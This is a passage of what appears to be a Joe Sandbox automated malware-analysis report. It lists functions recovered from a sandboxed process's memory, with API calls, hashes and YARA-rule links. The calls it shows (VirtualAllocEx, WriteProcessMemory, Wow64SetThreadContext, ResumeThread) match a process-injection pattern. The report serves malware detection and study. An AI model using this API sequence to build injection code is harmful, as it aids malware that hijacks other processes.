Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d625913e30b28d46b332203d699b9a15e9649b5d00d7d0fb928c8206b19201e6
Instruction ID: 63fabbf2238381fbb893f9df9a79b5dcf6322e17f60b410c4b1be571d5f0ffe1
Opcode Fuzzy Hash: d625913e30b28d46b332203d699b9a15e9649b5d00d7d0fb928c8206b19201e6
Instruction Fuzzy Hash: 672125B6901219DFCB10CFA9D985BDEBBF1FF48314F10852AE858A7250D338A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07E67340 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07E673CD

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 204609d3c317b99a28ad724d53c51bb53f54d5b8dace89b37afcad95a088de3d
Instruction ID: fc5ca029e987fdb0001a94fbd9fe52dcef5b7c8074989c041f326be7673ead00
Opcode Fuzzy Hash: 204609d3c317b99a28ad724d53c51bb53f54d5b8dace89b37afcad95a088de3d
Instruction Fuzzy Hash: 7C2103B1900359DFCB10CFAAC885BDEBBF5FB48314F10852AE958A7250D778A940CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 07E67128 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32 ref: 07E67192

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 73eab9df934706657f0eb9d7142ad395203ca245403a35f0e976d2cb94c82abe
Instruction ID: 9c91cc070bf046fc671fd27495e86acf246dcb6e1b744d8f5de1cc350ea5065b
Opcode Fuzzy Hash: 73eab9df934706657f0eb9d7142ad395203ca245403a35f0e976d2cb94c82abe
Instruction Fuzzy Hash: 822148B6900259CFCB10CF99D9857EEBBF4EF48324F24846AD568A3241D338A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07E675C9 Relevance: 1.6, APIs: 1, Instructions: 65windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07E6762D

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 785cb4421fd85a165fe617130a90c6994224e98e1e83a11545acf72c55fcb147
Instruction ID: 1a58922457d49f61ee87451bd3ce261694e4e953d4093cb34259a86fc4b62d2b
Opcode Fuzzy Hash: 785cb4421fd85a165fe617130a90c6994224e98e1e83a11545acf72c55fcb147
Instruction Fuzzy Hash: 1D216DB69002089FCB10DF99D848BEFBFF8EB88364F10845AE518A7310C775A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07E67419 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07E6747F

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e79dbb880a37b893781b2e2b24aacf2f2420a73cd14c8d065393d0331a1645ab
Instruction ID: b51ac5b6f70fdc7825abb7dc16705f6ab6caa413fc774a3248fc293805598234
Opcode Fuzzy Hash: e79dbb880a37b893781b2e2b24aacf2f2420a73cd14c8d065393d0331a1645ab
Instruction Fuzzy Hash: 8A2165B6C002088FCB20CFA9D4487DEFBF4EB48324F24842AD928A7251C734A940CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07E671E0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07E67253

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e52123228112187c547c649f25d3231d81af0dda2df6712e473c8f75dce1cbc7
Instruction ID: a7ad3a8aafd4b7010643ebd20e408f94fba92e7511ceea68d3e8ce07866afb40
Opcode Fuzzy Hash: e52123228112187c547c649f25d3231d81af0dda2df6712e473c8f75dce1cbc7
Instruction Fuzzy Hash: 5B1137B6900259DFCB10CFA9D948BDEBBF5EB48324F24841AE518A7250C734A540CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE925C3 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CE8CB3E,6CE89BD4,?,00000000,00000000,00000000,?,6CE8EA98,00000001,00000214), ref: 6CE92606

Part of subcall function 6CE8D7D8: __getptd_noexit.LIBCMT ref: 6CE8D7D8

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 8b83d5f92ce5389c054844eae5d81b88ba943757a2c424a43826185da8d87908
Instruction ID: e55405455218b52a46aaec8baa96b13d72fb011cd855a2e902e18b670be42c03
Opcode Fuzzy Hash: 8b83d5f92ce5389c054844eae5d81b88ba943757a2c424a43826185da8d87908
Instruction Fuzzy Hash: 4201B5313062155BEF159E25DC28B5A3374BBA276CF344629EC25C7F92DB34D4008781

Uniqueness

Uniqueness Score: -1.00%

Function 07E671E8 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07E67253

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: efea68080dac83a04984d2e28e246e28289bc0913ffbacfbc2e1d9951020f036
Instruction ID: 71f5bb58fbf17512b7db78c1d7aae9f602ecdc214b5ae8d43e80834db957b41d
Opcode Fuzzy Hash: efea68080dac83a04984d2e28e246e28289bc0913ffbacfbc2e1d9951020f036
Instruction Fuzzy Hash: 641104B5900249DFCB10DF9AC844BDEBFF5EB48324F208419E558A7250C775A940CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 07E67130 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32 ref: 07E67192

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9b7a1a7f2e51cdb66d705813eb63df5c1b824b6059622556b4db5fea35631a4a
Instruction ID: fade144e16467ad6832e20c97f8a0f79bd3d3cee261d3ccee5f310a545d4f90f
Opcode Fuzzy Hash: 9b7a1a7f2e51cdb66d705813eb63df5c1b824b6059622556b4db5fea35631a4a
Instruction Fuzzy Hash: CD1125B18003598FCB20DF9AC489BDEBBF4EF88324F208469D458A7251D738A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07E65DE4 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 07E69100

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 8a9fee04c56113c0e706f0dd0d03642836fec4a97f0abe4ed972e9c0b1b0724b
Instruction ID: fe008500c87d0afddd3f0ef63bef30855d0080036161675cc5513388389d37b6
Opcode Fuzzy Hash: 8a9fee04c56113c0e706f0dd0d03642836fec4a97f0abe4ed972e9c0b1b0724b
Instruction Fuzzy Hash: 221136B1800349DFCB20DF9AC449BEEBBF4EB48360F208419E958A7341D739A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4EA40 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

SysAllocString.OLEAUT32 ref: 6CE4EA8D

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: a79544f87e55eb45250e745c79d54a1b7eb034cfb7bbdd92389ab0bed68f9c83
Instruction ID: 78f284878d5346bc74f53f54d74b08cdf36187f3f4fffa4d83981195de586ac6
Opcode Fuzzy Hash: a79544f87e55eb45250e745c79d54a1b7eb034cfb7bbdd92389ab0bed68f9c83
Instruction Fuzzy Hash: EF019672905B55EFD310DF95D900B5AF7F8EB05B28F21831EEC25A7B80D7B5950086D4

Uniqueness

Uniqueness Score: -1.00%

Function 07E67298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 07E67302

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 719285d188cd195f1ba8625109811deb77e109db516bb3881ffb58d0804e0268
Instruction ID: e947a9964522ba795ea5c533df534878c7455aec90973d090ed03da786c08bdf
Opcode Fuzzy Hash: 719285d188cd195f1ba8625109811deb77e109db516bb3881ffb58d0804e0268
Instruction Fuzzy Hash: 161145B5900248CFCB20CF9AC589BDEBBF4EB48324F20841AD459B7250C734A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07E67420 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07E6747F

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0c8ec33cfae292fdb45c757c165a106be89d6f26cee48022ec2ad92b8115e036
Instruction ID: 1743e889ed134dc0c33b207e3427ff0c2ba672bdd14d2ddb617a475250af4363
Opcode Fuzzy Hash: 0c8ec33cfae292fdb45c757c165a106be89d6f26cee48022ec2ad92b8115e036
Instruction Fuzzy Hash: 041103B19003598FCB20DF9AD448BDEFFF4EB48324F24841AD558A7250C774A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07E6AAE8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 07E6BB1D

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 033c1c29c74746c3311a8d174c5bcd5dc2b6683276600b3be2599b6ed647a2b1
Instruction ID: 6a9240626e53f47eae941daedd282bdfd4723056e3b708c5a5dbf92c8c5f4722
Opcode Fuzzy Hash: 033c1c29c74746c3311a8d174c5bcd5dc2b6683276600b3be2599b6ed647a2b1
Instruction Fuzzy Hash: F21112B19003488FCB20DF9AD489BDEBBF4EB58364F208459E559A7254C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07E6BAC0 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 07E6BB1D

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 57b0e13c33ae3a487c35fba386c5b410118cfbe8fcdac66efa262ad5dedb18e4
Instruction ID: 384c44f32589e671db31e002ead43e48f40080e08a1c908bd3f813686eee60a9
Opcode Fuzzy Hash: 57b0e13c33ae3a487c35fba386c5b410118cfbe8fcdac66efa262ad5dedb18e4
Instruction Fuzzy Hash: 971145B19003498FCB20DFA9D488BCEBBF4EF48324F20855AD528B7290C338A540CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07E675D0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07E6762D

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 369b0962a9ace3f110f384ddd526319fd96ff9d717197e8cc7fb7329fe4f159a
Instruction ID: 99868aad7d03e2f96cc1a27407a62d9805dd36a085bdd35e855acd147bdd77fb
Opcode Fuzzy Hash: 369b0962a9ace3f110f384ddd526319fd96ff9d717197e8cc7fb7329fe4f159a
Instruction Fuzzy Hash: 9811E5B5800349DFDB10DF9AD489BDEFBF8EB48324F108459E558A7250C375A984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07E672A0 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 07E67302

Memory Dump Source

Source File: 00000004.00000002.1921425381.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e60000_4854.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: ca8a58ec9c05714d8469b6613b8b1b24509ffb8fc40026df3eafcb83457f298e
Instruction ID: fd3c4e8e07a34d1d3857e970712a38b0af2919b983c02a35eb39dea5997d3d34
Opcode Fuzzy Hash: ca8a58ec9c05714d8469b6613b8b1b24509ffb8fc40026df3eafcb83457f298e
Instruction Fuzzy Hash: C11112B1900249CFCB20DF9AC488BDEBFF4EB49324F208469D858A7250C774A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE89D21 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6CE8E8DC

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: H_prolog3_catch_malloc
String ID:
API String ID: 529455676-0
Opcode ID: 28e1675e209a05a490fc9563de652a72a00ed280130edb02f1a9d7c3557e0cc1
Instruction ID: 2d61f17decd0ce4cf7d8056c2d5bc0d4cff2ee7fad93a1b926e894d630967790
Opcode Fuzzy Hash: 28e1675e209a05a490fc9563de652a72a00ed280130edb02f1a9d7c3557e0cc1
Instruction Fuzzy Hash: C8D05B3161620897CB41A7988405B9D7BB05B42715F700069F00C77B40DA7549048755

Uniqueness

Uniqueness Score: -1.00%

Function 6CE8A510 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

___security_init_cookie.LIBCMT ref: 6CE8A510

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ___security_init_cookie
String ID:
API String ID: 3657697845-0
Opcode ID: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
Instruction ID: bf18b2e9978c44e8118e36abc75f84d964f0059e9e9e98f76ae84ec611e4004b
Opcode Fuzzy Hash: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
Instruction Fuzzy Hash: 2CC09B351453489F8F04CF10F440CDE3735EB54234730D12DFC1C06B509B319965D560

Uniqueness

Uniqueness Score: -1.00%

Function 0583F830 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

pbq, xrefs: 0583F915

Memory Dump Source

Source File: 00000004.00000002.1918760922.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5830000_4854.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: a56a771696cf26bc886155053555df9a49e914b66aa0f8336f572c4ff10a1f0d
Instruction ID: 93796786bc40b6fdc6e508e2efcccff3052af92b793820c813a30d93c9f9461b
Opcode Fuzzy Hash: a56a771696cf26bc886155053555df9a49e914b66aa0f8336f572c4ff10a1f0d
Instruction Fuzzy Hash: D8416D34A0020ACFDB14DF69C485A6ABBB2FF84314F148569EA568B375DB34EC85CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0583F0E0 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

8cq, xrefs: 0583F10E

Memory Dump Source

Source File: 00000004.00000002.1918760922.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5830000_4854.jbxd

Similarity

API ID:
String ID: 8cq
API String ID: 0-304758316
Opcode ID: eba604d9b51c9da7092560a404f38f944b41df5fcab54bf51606778bbf39f14c
Instruction ID: 9b95e0623ad95b3c2b8a2a0e332227a56217dcc3de1c98ad54f246b5c0b53fcb
Opcode Fuzzy Hash: eba604d9b51c9da7092560a404f38f944b41df5fcab54bf51606778bbf39f14c
Instruction Fuzzy Hash: 59016D75B002089FC704DBA9D884EAFBBF4EF89320F108165F505AB351DB30AD00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0322BC68 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1910794254.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3220000_4854.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89b6a5b48b1a9313fda564989f8d87c8f621031be0c07326df0cbe0e643173b6
Instruction ID: fbd1505a6dbd2bb103fc75d45b74b318d317d8580066878f6f94689e19707253
Opcode Fuzzy Hash: 89b6a5b48b1a9313fda564989f8d87c8f621031be0c07326df0cbe0e643173b6
Instruction Fuzzy Hash: 01A17535A10615CFCB04DF68C8849ADFBB1FF89310F1586A9E505AB365EB70E985CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0322AD38 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1910794254.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3220000_4854.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9d35b71a65d0a41575272e68a926c947c3fe4e7b2ffc5002e21be20c1d2fdb5
Instruction ID: 34d48095ff2fa6380716b27d2efd88f31bb70ff229faf0c906a047a1492fb89d
Opcode Fuzzy Hash: a9d35b71a65d0a41575272e68a926c947c3fe4e7b2ffc5002e21be20c1d2fdb5
Instruction Fuzzy Hash: 7091F274E102199FDB14CFA8D994BADBBF2FF49300F1081AAD509AB3A4DB759981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0322E4C8 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1910794254.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3220000_4854.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5b27d89bb8b2dca9df318e9131a8da83a95fa48d4b77b374470df619383def2
Instruction ID: 32da0d70468bb0bd73f6f10ddd8f813804fe6e3de2255c9bd40a19791698f247
Opcode Fuzzy Hash: b5b27d89bb8b2dca9df318e9131a8da83a95fa48d4b77b374470df619383def2
Instruction Fuzzy Hash: 98313574A28225DFE700DF29E8457EABFB5EB88315F04C075E5418B281EA75C890DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0144D3B4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1909825518.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_144d000_4854.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0484b3a025612e1f61a8c29ae48fbfb7b8361b4120ff0a6fe465caab4b92a73b
Instruction ID: 00800d57319df7af434f278256a2fabddf503719e0213b60f37372975dac47f0
Opcode Fuzzy Hash: 0484b3a025612e1f61a8c29ae48fbfb7b8361b4120ff0a6fe465caab4b92a73b
Instruction Fuzzy Hash: 9C210371A00200DFEB05DF98D9C0B67BF65FBA4314F20C57AE9094B266C336E456CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0145DCD8 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1909912287.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_145d000_4854.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33de8844ffcc990482cc6d30ea5f0ed9c7f5c98a8f185b20f7ce0672285258a8
Instruction ID: 4614fef68c5f98d9d6f154cc70fdfdffe9aed89cb2edff8988448615bf7a841f
Opcode Fuzzy Hash: 33de8844ffcc990482cc6d30ea5f0ed9c7f5c98a8f185b20f7ce0672285258a8
Instruction Fuzzy Hash: C221C171904244DFDB45DF58D980B2ABBA5EF84314F24C56ADD094A367C336D44BCAA2

Uniqueness

Uniqueness Score: -1.00%

Function 07E52516 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1921401699.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e50000_4854.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86364b5fef9d76e9eb25dfebf2bbc84f5f56460a6f831bba60dbbb3ab9b555f4
Instruction ID: f17f61ff603f010ed7d77a831800256c3d914a592f2ee8f695854fa04c979a6f
Opcode Fuzzy Hash: 86364b5fef9d76e9eb25dfebf2bbc84f5f56460a6f831bba60dbbb3ab9b555f4
Instruction Fuzzy Hash: 9B21A3F0A112098BCB14CF68D55069E77F6BF84310F15D915E916CB354DF34EC428B81

Uniqueness

Uniqueness Score: -1.00%

Function 0145DDC0 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1909912287.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_145d000_4854.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f41a776cd1e41456b7f616786b85fb20dcbfd6a53d9f3f3fcd18e00c7cb59dc5
Instruction ID: a2aa77544820b8f5771207370bd9897d9912dab95e9634b194e9cb5ca09ab3c7
Opcode Fuzzy Hash: f41a776cd1e41456b7f616786b85fb20dcbfd6a53d9f3f3fcd18e00c7cb59dc5
Instruction Fuzzy Hash: 83210071904244DFCB41DF58D980B2BBB65FB98324F24C56ADD094B367C336D446D6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0145D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1909912287.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false

Joe Sandbox IDA Plugin

